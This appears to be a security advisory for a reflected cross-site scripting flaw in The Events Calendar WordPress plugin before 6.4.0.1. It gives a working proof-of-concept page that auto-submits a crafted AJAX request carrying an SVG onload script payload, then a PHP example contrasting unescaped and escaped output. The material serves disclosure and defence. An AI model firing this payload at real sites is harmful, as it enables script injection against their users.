wpexploit | Marc Montpas | WPEX-ID: B2A92316-E404-4A5E-8426-F88DF6E87550
History: May 14, 2024 - 12:00 a.m.

The Events Calendar < 6.4.0.1 - Reflected XSS

2024-05-14 00:00:00
Marc Montpas
Tags: reflected xss, the events calendar, update by may 28 2024

AI Score: 6.8 Medium (Confidence: Low)

EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not properly sanitize user-submitted content when rendering some views via AJAX.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>The Events Calendar <= 6.3.6 - Reflected XSS</title>
</head>
<body onload="document.getElementById('autoSubmitForm').submit();">
    <form id="autoSubmitForm" action="http://vulnerablesite.tld/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="tribe_events_views_v2_fallback">
        <input type="hidden" name="view" value="reflector">
        <input type="hidden" name="view_data[lala]" value="<svg onload=alert(document.domain);></svg>">
    </form>
</body>
</html>
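As an added illustration (not The Events Calendar's code), the following hypothetical WordPress-style handler reflects the submitted view_data[] entries back into HTML the way the PoC above relies on, next to the output-escaped form the description calls for. The function names are placeholders, and htmlspecialchars() stands in for WordPress's esc_html()/esc_attr() so the snippet runs without WordPress.

```php
<?php
// Added illustration, not The Events Calendar's code: a hypothetical AJAX
// handler that reflects the submitted view_data[] array into HTML.
// reflect_view_data_unsafe / reflect_view_data_safe are placeholder names.

// Vulnerable pattern: request-controlled keys and values are concatenated
// straight into markup, so a value such as the PoC's
// "<svg onload=alert(document.domain);></svg>" becomes live markup.
function reflect_view_data_unsafe(array $view_data): string
{
    $items = '';
    foreach ($view_data as $key => $value) {
        $items .= "<li data-view=\"{$key}\">{$value}</li>";
    }
    return "<ul>{$items}</ul>";
}

// Escape for the HTML body / double-quoted attribute context. Inside
// WordPress this is what esc_html() and esc_attr() do; htmlspecialchars()
// is used here so the example runs stand-alone.
function esc_html_ctx(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: every reflected piece is escaped at the point of output,
// so the submitted string is rendered as text rather than parsed as a tag.
function reflect_view_data_safe(array $view_data): string
{
    $items = '';
    foreach ($view_data as $key => $value) {
        $items .= '<li data-view="' . esc_html_ctx((string) $key) . '">'
                . esc_html_ctx((string) $value) . '</li>';
    }
    return "<ul>{$items}</ul>";
}

// Constructed input mirroring the advisory's PoC parameter, view_data[lala].
$submitted = ['lala' => '<svg onload=alert(document.domain);></svg>'];

echo "unsafe: ", reflect_view_data_unsafe($submitted), PHP_EOL;
echo "safe:   ", reflect_view_data_safe($submitted), PHP_EOL;
```

Running it shows the unescaped branch emitting the submitted <svg> element intact, while the escaped branch emits only entity-encoded text, which is the check to apply to any view that echoes request data back through admin-ajax.php.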

